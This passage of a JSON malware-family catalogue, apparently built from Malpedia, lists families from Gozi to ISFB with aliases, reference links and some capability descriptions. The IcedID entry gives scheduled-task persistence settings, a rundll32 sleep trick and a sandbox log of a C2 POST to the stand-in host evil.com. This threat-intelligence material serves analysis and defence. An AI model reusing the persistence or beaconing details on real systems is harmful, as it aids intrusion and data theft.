a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", - "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", - "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", - "https://de.securelist.com/analysis/59479/erpresser/", - "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", - "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" - ] - }, - "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", - "value": "GPCode", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", - "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" - ] - }, - "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", - "value": "GrabBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", - "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" - ] - }, - "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", - "value": "Graftor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "FrameworkPOS", - "trinity" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", - "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" - ] - }, - "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", - "value": "Grateful POS", - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] - }, - "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", - "value": "Gratem", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", - "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", - "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" - ] - }, - "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", - "value": "Gravity RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "eoehttp" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", - "https://blog.cylance.com/spear-a-threat-actor-resurfaces" - ] - }, - "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", - "value": "GreenShaitan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", - "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] - }, - "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", - "value": "GROK", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", - "https://attack.mitre.org/wiki/Technique/T1003" - ] - }, - "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", - "value": "gsecdump", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", - "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" - ] - }, - "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", - "value": "H1N1 Loader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", - "value": "Hacksfase", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", - "https://github.com/ratty3697/HackSpy-Trojan-Exploit" - ] - }, - "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", - "value": "HackSpy", - "description": "Py2Exe based tool as found on github." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", - "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" - ] - }, - "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", - "value": "Hamweq", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Chanitor" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", - "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", - "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", - "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" - ] - }, - "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", - "value": "Hancitor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" - ] - }, - "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", - "value": "HappyLocker (HiddenTear?)", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Piptea" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", - "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", - "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" - ] - }, - "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", - "value": "Harnig", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", - "https://www.f-secure.com/weblog/archives/00002718.html" - ] - }, - "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", - "value": "Havex RAT", - "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." - }, - { - "meta": { - "synonyms": [ - "Predator Pain" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", - "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", - "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", - "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", - "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", - "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" - ] - }, - "uuid": "31615066-dbff-4134-b467-d97a337b408b", - "value": "HawkEye Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", - "value": "Helauto", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", - "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" - ] - }, - "uuid": "19d89300-ff97-4281-ac42-76542e744092", - "value": "Helminth", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", - "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", - "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" - ] - }, - "uuid": "bb07e153-2e51-4ce1-97a3-4ec8a936e625", - "value": "Heloag", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", - "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" - ] - }, - "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", - "value": "Herbst", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", - "value": "Heriplor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", - "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] - }, - "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", - "value": "Hermes", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] - }, - "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", - "value": "Hermes Ransomware", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" - ] - }, - "uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", - "value": "HerpesBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" - ] - }, - "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", - "value": "HesperBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", - "https://github.com/goliate/hidden-tear", - "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", - "https://twitter.com/struppigel/status/950787783353884672" - ] - }, - "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", - "value": "HiddenTear", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", - "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", - "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" - ] - }, - "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", - "value": "HideDRV", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", - "https://www.recordedfuture.com/hidden-lynx-analysis/", - "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" - ] - }, - "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", - "value": "HiKit", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", - "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" - ] - }, - "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", - "value": "himan", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", - "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" - ] - }, - "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", - "value": "Hi-Zor RAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" - ] - }, - "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", - "value": "HLUX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", - "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] - }, - "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", - "value": "homefry", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" - ] - }, - "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", - "value": "HtBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", - "https://www.riskiq.com/blog/labs/htprat/" - ] - }, - "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", - "value": "htpRAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "HUC Packet Transmit Tool" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", - "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", - "https://www.secureworks.com/research/htran" - ] - }, - "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", - "value": "HTran", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", - "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" - ] - }, - "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", - "value": "HttpBrowser", - "description": "" - }, - { - "meta": { - "synonyms": [ - "httpdr0pper" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", - "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", - "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" - ] - }, - "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", - "value": "httpdropper", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", - "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", - "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] - }, - "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", - "value": "http_troy", - "description": "" - }, - { - "meta": { - "synonyms": [ - "houdini" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", - "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" - ] - }, - "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", - "https://securelist.com/luckymouse-hits-national-data-center/86083/" - ] - }, - "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", - "value": "HyperBro", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BokBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", - "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", - "https://www.fidelissecurity.com/threatgeek/2017/11/tracking-emotet-payload-icedid", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", - "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] - }, - "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", - "value": "IcedID", - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If \u201c/i\u201d is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If \u201c/I\u201d is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader", - "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/", - "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/" - ] - }, - "uuid": "c3be9189-f8f2-45e4-b6a3-8960fd5ffc16", - "value": "IcedID Downloader", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.icefog", - "http://www.kz-cert.kz/page/502" - ] - }, - "uuid": "48cdcbcf-38a8-4c68-a85e-42989ca28861", - "value": "Icefog", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix", - "https://securelist.com/ice-ix-not-cool-at-all/29111/", - "https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus", - "https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/" - ] - }, - "uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3", - "value": "Ice IX", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.idkey", - "https://isc.sans.edu/diary/22766" - ] - }, - "uuid": "3afecded-3461-45f9-8159-e8328e56a916", - "value": "IDKEY", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.iisniff", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/The-Curious-Case-of-the-Malicious-IIS-Module/" - ] - }, - "uuid": "3b746f77-214b-44f9-9ef2-0ae6b52561d6", - "value": "IISniff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.imecab", - "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east" - ] - }, - "uuid": "0ea585ef-bd32-4f5b-a3fe-bb48dc0956c7", - "value": "Imecab", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.imminent_monitor_rat", - "https://itsjack.cc/blog/2016/01/imminent-monitor-4-rat-analysis-a-glance/" - ] - }, - "uuid": "53021414-97ad-4102-9cff-7a0e1997f867", - "value": "Imminent Monitor RAT", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Foudre" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", - "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", - "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", - "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", - "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" - ] - }, - "uuid": "53616ce4-9b8e-45a0-b380-9e778cd95ae2", - "value": "Infy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.innaput_rat", - "https://asert.arbornetworks.com/innaput-actors-utilize-remote-access-trojan-since-2016-presumably-targeting-victim-files/" - ] - }, - "uuid": "dd486e92-54fe-4306-9aab-05863cb6c6e1", - "value": "InnaputRAT", - "description": "InnaputRAT, a RAT capable of exfiltrating files from victim machines, was distributed by threat actors using phishing and Godzilla Loader. The RAT has evolved through multiple variants dating back to 2016. Recent campaigns distributing InnaputRAT beaconed to live C2 as of March 26, 2018." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", - "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" - ] - }, - "uuid": "22755fda-497e-4ef0-823e-5cb6d8701420", - "value": "InvisiMole", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Gozi ISFB", - "IAP", - "Pandemyia" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", - "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", - "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", - "https://lokalhost.pl/gozi_tree.txt", - "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", - "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", - "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", - "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", - "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", - "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", - "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", - "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", - "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/" - ] - }, - "uuid": "a171321e-4968-4ac0-8497-3250c1f0d77d", - "value": "ISFB", - "description": "2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked. This led to two main branches: one became known as Gozi Prinimalka, which was merge with Pony and became Vawtrak/Neverquest.\r\n\r\nThe other branch became known as Gozi ISFB, or ISFB in short. Webinject functionality was added to this version.\r\n\r\nThere is one panel which often was used in combination with ISFB: IAP. The panel's login page comes with the title 'Login - IAP'. The body contains 'AUTHORIZATION', 'Name:', 'Password:' and a single button 'Sign in' in a minimal design. Often, the panel is directly accessible by entering the C2 IP address in a browser. But there are ISFB versions which are not directly using IAP. The bot accesses a gate, which is called the 'Dreambot' gate. See win.dreambot for further information.\r\n\r\nISFB often was protected by Rovnix. This led to a further complication in the naming scheme - many companies started to call ISFB Rovnix. Because the signatures started to look for Rovnix, other trojans protected by Rovnix (in particular ReactorBot and 